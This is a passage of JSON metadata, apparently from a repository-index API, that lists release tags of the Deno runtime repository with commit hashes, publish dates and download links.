d/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ec